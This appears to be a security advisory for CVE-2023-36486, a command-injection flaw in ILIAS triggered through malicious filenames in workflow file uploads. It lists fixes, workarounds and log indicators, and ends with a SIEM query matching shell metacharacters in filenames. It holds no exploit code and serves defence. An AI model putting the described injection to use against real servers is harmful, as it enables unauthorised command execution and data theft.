CVE-2023-36486
📋 TL;DR
This vulnerability allows remote authenticated users to execute arbitrary system commands on the ILIAS application server by uploading a workflow definition file with a malicious filename. The attacker needs valid credentials but can then run commands as the application user, potentially compromising the entire server. This affects ILIAS e-learning platforms running vulnerable versions.
💻 Affected Systems
- ILIAS Learning Management System
📦 What is this software?
Ilias by Ilias
Ilias by Ilias
⚠️ Risk & Real-World Impact
Worst Case
Full server compromise leading to data theft, lateral movement, ransomware deployment, or complete system takeover.
Likely Case
Unauthorized command execution allowing data exfiltration, backdoor installation, or service disruption.
If Mitigated
Limited impact if proper file upload validation and user privilege restrictions are in place.
🎯 Exploit Status
Exploitation requires authenticated access and knowledge of workflow file upload functionality.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: ILIAS 7.23 and 8.3
Restart Required: Yes
Instructions:
1. Backup your ILIAS installation and database. 2. Download and install ILIAS 7.23 or 8.3 from the official repository. 3. Follow the ILIAS update documentation for your version. 4. Restart the web server and verify functionality.
🔧 Temporary Workarounds
Disable workflow-engine uploads
allTemporarily disable the workflow definition file upload functionality until patching.
# Modify ILIAS configuration to restrict workflow file uploads
# Check ILIAS documentation for specific configuration options
Restrict user permissions
allLimit which authenticated users can upload workflow definition files.
# Review and modify user role permissions in ILIAS administration panel
# Remove workflow upload permissions from non-essential users
🧯 If You Can't Patch
- Implement strict file upload validation to reject filenames with special characters or command injection patterns.
- Deploy web application firewall (WAF) rules to block malicious file upload attempts targeting workflow definitions.
🔍 How to Verify
Check if Vulnerable:
Check your ILIAS version via the administration interface or by examining the installation files. Versions before 7.23 or 8.x before 8.3 are vulnerable.Check Version:
# Check ILIAS version via web interface: Admin > System Information, or # Check version in ILIAS installation directory filesVerify Fix Applied:
After updating, verify the version shows 7.23 or higher, or 8.3 or higher. Test workflow file upload functionality with safe test files.📡 Detection & Monitoring
Log Indicators:
- Unusual file uploads to workflow-engine endpoints
- System command execution patterns in application logs
- Failed upload attempts with suspicious filenames
Network Indicators:
- HTTP POST requests to workflow file upload endpoints with unusual filenames
- Outbound connections from the application server following file uploads
SIEM Query:
source="web_server_logs" AND (uri_path="/workflow-engine/upload" OR uri_path="*workflow*") AND (filename="*;*" OR filename="*|*" OR filename="*`*" OR filename="*$(*")🔗 References
- https://docu.ilias.de/ilias.php?baseClass=ilrepositorygui&cmdNode=xd:kx:54&cmdClass=ilBlogPostingGUI&cmd=previewFullscreen&ref_id=3439&prvm=fsc&bmn=2023-12&blpg=786
- https://github.com/ILIAS-eLearning/ILIAS/pull/5987
- https://github.com/ILIAS-eLearning/ILIAS/pull/5988
- https://docu.ilias.de/ilias.php?baseClass=ilrepositorygui&cmdNode=xd:kx:54&cmdClass=ilBlogPostingGUI&cmd=previewFullscreen&ref_id=3439&prvm=fsc&bmn=2023-12&blpg=786
- https://github.com/ILIAS-eLearning/ILIAS/pull/5987
- https://github.com/ILIAS-eLearning/ILIAS/pull/5988
